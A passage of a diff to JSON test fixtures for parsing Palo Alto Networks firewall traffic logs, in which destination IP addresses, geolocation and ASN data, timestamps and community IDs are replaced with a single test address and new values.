"lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 196, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { 
@@ -4993,7 +5046,7 @@ "packets": 2, "ip": "192.168.15.210" }, - "message": "192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5008,7 +5061,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -5082,14 +5135,14 @@ ], "ip": [ "192.168.15.210", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941894586Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031597200Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -5112,27 +5165,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.193" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5003, - "ip": "184.51.253.193", + "ip": "175.16.199.1", "packets": 10 }, "rule": { 
@@ -5151,7 +5206,7 @@ "packets": 12, "ip": "192.168.15.224" }, - "message": "192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5166,7 +5221,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.193" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -5188,7 +5243,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:zBrhHOnlJT7YZV7WXiPAQBEhScI=" + "community_id": "1:S3xHgnhs3FnbwlCMr3H/2qm1oZA=" } }, "sequence_number": 32091143, @@ -5208,8 +5263,8 @@ ], "network": { "community_id": [ - "1:zaX+BV1nxniPCPzIGKhVpm2i7CE=", - "1:zBrhHOnlJT7YZV7WXiPAQBEhScI=" + "1:qhgYAT01S/8A/mURcMaYCBM5NnE=", + "1:S3xHgnhs3FnbwlCMr3H/2qm1oZA=" ], "transport": "tcp", "application": "ssl", 
@@ -5249,14 +5304,14 @@ ], "ip": [ "192.168.15.224", - "184.51.253.193", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941898026Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031602600Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -5279,27 +5334,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 171, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5318,7 +5375,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5333,7 +5390,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -5355,7 +5412,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=" + "community_id": "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=" } }, "sequence_number": 32091144, 
@@ -5375,8 +5432,8 @@ ], "network": { "community_id": [ - "1:BengLCKQRlHSjje1eFQLdxgTKJc=", - "1:QjiWUuclXv+JzWhbuYDyyP+YyTk=" + "1:QvcLIBQ/llZfAEhjuMmKr/RH930=", + "1:Y+f0oZmTdWUv5nZ7tWfD0Hvy1No=" ], "transport": "udp", "application": "dns", @@ -5416,14 +5473,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941901536Z", - "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031608400Z", + "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -5446,25 +5503,30 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 + } + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, "port": 4282, "bytes": 0, - "packets": 0, - "ip": "199.167.55.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "name": "new_outbound_from_trust" @@ -5482,7 +5544,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5497,7 +5559,7 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -5519,7 +5581,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:WSYAeVnYXY4WmfLFYEEo/atQJE8=" + "community_id": "1:QLpzIj2P/pM1IPhxoQgvo1NvlF4=" } }, "sequence_number": 32091145, @@ -5539,8 +5601,8 @@ ], "network": { "community_id": [ - "1:wFD93203ukPDpbZjVJE5SAMYrw4=", - "1:WSYAeVnYXY4WmfLFYEEo/atQJE8=" + "1:22CvovQQDhMcaR2aY+8zyK8hACA=", + "1:QLpzIj2P/pM1IPhxoQgvo1NvlF4=" ], "transport": "tcp", "application": "incomplete", @@ -5580,14 +5642,14 @@ ], "ip": [ "192.168.15.224", - "199.167.55.52", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941907254Z", - "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031613700Z", + "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -5610,30 +5672,29 @@ "destination": { "nat": { "port": 17472, - "ip": "199.167.52.219" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 54538, + "number": 4837, "organization": { - "name": "PALO ALTO NETWORKS" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 17472, "bytes": 2316, - "ip": "199.167.52.219", + "ip": "175.16.199.1", "packets": 9 }, "rule": { @@ -5652,7 +5713,7 @@ "packets": 11, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5667,7 +5728,7 @@ "destination": { "nat": { "port": 17472, - "ip": "199.167.52.219" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -5689,7 +5750,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:XrQuj5ypAzAqGAy0lpIvWQVVZ2E=" + "community_id": "1:Gk7uyZrTczUbrHn/2IrftpQXmRo=" } }, "sequence_number": 32091146, @@ -5709,8 +5770,8 @@ ], "network": { "community_id": [ - "1:9oIDq1tuilAK1JGhtfp35vZpz4w=", - "1:XrQuj5ypAzAqGAy0lpIvWQVVZ2E=" + "1:nHM1z1SSNdcNZLyG13Mqi3kJU1k=", + "1:Gk7uyZrTczUbrHn/2IrftpQXmRo=" ], "transport": "tcp", "application": "tanium", @@ -5750,14 +5811,14 @@ ], "ip": [ "192.168.15.224", - "199.167.52.219", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941911018Z", - "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031619300Z", + "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -5780,30 +5841,29 @@ "destination": { "nat": { "port": 443, - "ip": "52.71.117.196" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 13966, - "ip": "52.71.117.196", + "ip": "175.16.199.1", "packets": 19 }, "rule": { @@ -5822,7 +5882,7 @@ "packets": 19, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -5837,7 +5897,7 @@ "destination": { "nat": { "port": 443, - "ip": "52.71.117.196" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -5859,7 +5919,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:EG9O/WtvoWuYwaB1MXJTgr43kac=" + "community_id": "1:A8ZPiK3JI+oWJOzzVdsg8jXl6O4=" } }, "sequence_number": 32091147, @@ -5879,8 +5939,8 @@ ], "network": { "community_id": [ - "1:lrruE+4dZreV0/+v9V1CpxRnfsE=", - "1:EG9O/WtvoWuYwaB1MXJTgr43kac=" + "1:j9qImNtMOJSwp6qNPrLrqmy50YY=", + "1:A8ZPiK3JI+oWJOzzVdsg8jXl6O4=" ], "transport": "tcp", "application": "ssl", @@ -5920,14 +5980,14 @@ ], "ip": [ "192.168.15.224", - "52.71.117.196", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 4000000000, - "ingested": "2021-09-08T12:40:05.941914551Z", - "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031624700Z", + "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -5950,27 +6010,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 244, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5989,7 +6051,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6004,7 +6066,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -6026,7 +6088,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=" + "community_id": "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=" } }, "sequence_number": 32091148, 
@@ -6046,8 +6108,8 @@ ], "network": { "community_id": [ - "1:b/0kdGUcINh0ryiR0w0QTg0t0jQ=", - "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=" + "1:mWbN4QHKVTUC68wg5wKOivMQ8W8=", + "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=" ], "transport": "udp", "application": "dns", @@ -6087,14 +6149,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941918069Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031630Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -6117,27 +6179,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 205, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -6156,7 +6220,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6171,7 +6235,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -6193,7 +6257,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=" + 